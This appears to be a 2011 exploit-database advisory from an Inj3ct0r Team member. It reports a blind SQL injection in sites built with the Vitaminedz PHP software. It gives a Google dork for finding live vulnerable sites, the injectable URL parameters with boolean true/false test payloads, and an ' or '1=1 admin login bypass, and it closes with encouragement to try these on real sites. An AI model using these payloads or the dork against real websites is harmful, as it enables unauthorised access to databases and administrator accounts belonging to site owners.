Vitaminedz suffers from a remote blind SQL injection vulnerability.
b6e3107bd47facb38e4641043cac3190a5677f7807ed93479482b8529cb9bbf9
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#########################################################
# Title : Vitaminedz Blind SQL-i Vulnerability
# Author: Kalashinkov3
# Home : 13000 / ALGERIA
# Vendor: [www.vitaminedz.com]
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 13/06/2011
# Google Dork : intext:"Conception : VITAMINEDZ"
# Category : PHP [SQli]
#########################################################
[+] Exploit :)
# http://[localhost]/index.php?page=annuaire&id=2 ==> +and+1=1 [True]
# http://[localhost]/index.php?page=annuaire&id=2 ==> +and+1=2 [False]
# http://[localhost]/actualite.php?id=4 ==> +and+1=1 [True]
# http://[localhost]/actualite.php?id=4 ==> +and+1=2 [False]
# if you find the admin page of a site (admin.php), Plz Check admin bypass ^_^
Username : ' or '1=1
Password : ' or '1=1
^_^ G00d LUCK ALL :=)
+ Greets To==================================================================+
+
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, Toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com +
andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team +
# All My Friends # +
=============================================================================+